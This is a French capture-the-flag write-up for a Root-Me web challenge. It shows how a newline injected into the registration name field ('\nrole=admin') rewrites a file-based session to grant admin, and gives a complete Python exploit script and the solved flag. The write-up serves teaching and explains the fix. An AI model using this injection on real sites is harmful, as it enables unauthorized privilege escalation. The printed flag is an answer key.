✅ Day 15 - New new .. always new

  • WEB
  • Date de résolution : 13/12/2024

Reconnaissance

Ce challenge consiste à devenir admin sur le site web.
Il est possible de s'enregistrer mais dans la fonction register(), le rôle est écrit en dur = 'user' !
On remarque ensuite que la fonction create_session() est un peu particulière car elle enregistre les données de session dans un fichier... Hummm !

# Session store as written by the challenge's create_session() (fragment; the
# enclosing function is not shown here). Each field is appended as one
# "key=value" line, and nothing in this fragment rejects the line separator
# the format itself relies on, so a value containing '\n' ends its own line
# and what follows is read back as a further field. Server-side fix: refuse
# control characters in user-supplied fields (or serialize the session with a
# structured format such as json instead of a hand-rolled line format), and
# never derive a privilege such as `role` from data a user could have shaped.
with open(session_file, 'w') as f:
    f.write(f'email={email}\n')
    f.write(f'role={role}\n')
    # `name` is taken from the registration form — this is the injection point.
    f.write(f'name={name}\n')

Et si je surchargeais mon {name} avec un saut de ligne '\n' suivi de role=admin ? PWN !!

Exploit

Mon script avec l'exploit complet :

 1import requests
 2from requests.packages.urllib3.exceptions import InsecureRequestWarning
 3requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 4import json
 5
# Base URL of the challenge instance; the commented-out line is presumably a
# local copy used while writing the script.
URL_BASE = "https://day15.challenges.xmas.root-me.org/"
#URL_BASE = "http://localhost:8000/"
# Throwaway account: created by register(), reused by login().
EMAIL = "toto@wonderland.fr"
NAME="toto"
PASS = "toto"
# Browser-like headers sent with every request. Content-Type is JSON for the
# two POSTs; dashboard() and admin() overwrite it in place for their GETs, so
# this dict is mutated at module level as the script runs.
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate, br',
    'Content-Type': 'application/json',
    # Origin echoes the base URL as-is (trailing slash included).
    'Origin': URL_BASE,
    'Upgrade-Insecure-Requests': '1'
}
20
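def register(session):
    """Create the throwaway account whose `name` carries the session-file payload.

    Args:
        session: a requests.Session; cookies it receives are reused later.

    Returns:
        The response body (str) of POST /register.

    Why the server is affected (and what it should do instead): its
    create_session() writes the session as newline-separated "key=value"
    lines and does not reject '\\n' in user-supplied fields, so the trailing
    "\\nrole=admin" in `name` is read back as a second `role=` line. Rejecting
    control characters in registration fields, or serializing the session as
    JSON rather than a hand-rolled line format, removes the issue.
    """
    print("REGISTERING...")
    # Build the body with json.dumps instead of string concatenation so it
    # stays well-formed JSON whatever the constants contain (quotes and
    # backslashes get escaped). For the constants above this yields
    # byte-for-byte the same document as the original concatenation.
    json_data = json.dumps({
        "email": EMAIL,
        "name": NAME + "\nrole=admin",
        "password": PASS,
    })
    print(f"{json_data = }")
    url = URL_BASE + "register"
    # verify=False: the challenge host's TLS certificate is not trusted by the
    # client; keep this confined to the lab target.
    r = session.post(url, headers=HEADERS, data=json_data, verify=False)
    return r.text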
28
def login(session):
    """Authenticate the account created by register() and keep its cookie.

    The server answers with a `session_id` cookie; the passed-in
    requests.Session retains it for the later dashboard()/admin() calls.
    Returns the response body (str) of POST /login.
    """
    print("LOGIN...")
    credentials = {"email": EMAIL, "password": PASS}
    r = session.post(
        URL_BASE + "login",
        headers=HEADERS,
        data=json.dumps(credentials),
        verify=False,
    )
    print(f"{r.cookies.get('session_id') = }")
    return r.text
37
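def dashboard(session):
    """Fetch /dashboard as the logged-in user and return the response body.

    Args:
        session: the requests.Session holding the `session_id` cookie
            obtained by login().

    Returns:
        The response body (str) of GET /dashboard.
    """
    print("DASHBOARDING...")
    url = URL_BASE + "dashboard"
    # Use a per-request copy of the headers rather than rewriting the
    # module-level HEADERS['Content-Type'] in place: the in-place write made
    # every later POST (e.g. a second register()) silently go out with a form
    # content type instead of JSON. The request itself is unchanged.
    headers = {**HEADERS, 'Content-Type': 'application/x-www-form-urlencoded'}
    r = session.get(url, headers=headers, cookies=session.cookies, verify=False)
    return r.text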
44
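def admin(session):
    """Fetch /admin with the current session and return the response body.

    The flag is expected in this page once the session file lists the
    injected `role=admin` line.

    Args:
        session: the requests.Session holding the `session_id` cookie
            obtained by login().

    Returns:
        The response body (str) of GET /admin.
    """
    print("GO TO THE FLAG...")
    url = URL_BASE + "admin"
    # Per-request header copy instead of mutating the shared HEADERS dict;
    # the in-place write left a form content type behind for any later POST.
    headers = {**HEADERS, 'Content-Type': 'application/x-www-form-urlencoded'}
    r = session.get(url, headers=headers, cookies=session.cookies, verify=False)
    return r.text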
51
if __name__ == "__main__":
    # One Session carries the cookie from login() to the two GETs. The login
    # body itself is not printed; only its cookie matters.
    session = requests.Session()
    print(register(session))
    login(session)
    print(dashboard(session))
    print(admin(session))
FLAG

The flag is : RM{I_Thought_Th1s_VUlnerab1ility_W4s_N0t_Imp0rtant}